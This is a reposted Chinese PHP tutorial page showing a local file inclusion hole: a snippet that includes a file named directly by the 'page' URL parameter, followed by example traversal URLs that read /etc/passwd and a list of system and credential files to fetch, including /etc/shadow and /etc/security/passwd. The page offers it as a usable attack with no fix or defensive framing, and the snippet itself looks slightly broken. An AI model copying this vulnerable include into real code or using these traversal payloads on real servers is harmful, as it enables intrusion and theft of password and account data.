加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > PHP教程 > 正文

php 伪造本地文件包含漏洞的代码

发布时间:2020-12-13 06:01:14 所属栏目:PHP教程 来源:网络整理
导读:代码: div class="codetitle" a style="CURSOR: pointer" data="14167" class="copybut" id="copybut14167" onclick="doCopy('code14167')" 代码如下: div class="codebody" id="code14167" ?php $page=$_GET['page']; include($page.'php'); ? 你可以这样使

代码:
<div class="codetitle"><a style="CURSOR: pointer" data="14167" class="copybut" id="copybut14167" onclick="doCopy('code14167')"> 代码如下:<div class="codebody" id="code14167">
<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd 获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default 来自hackteach

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读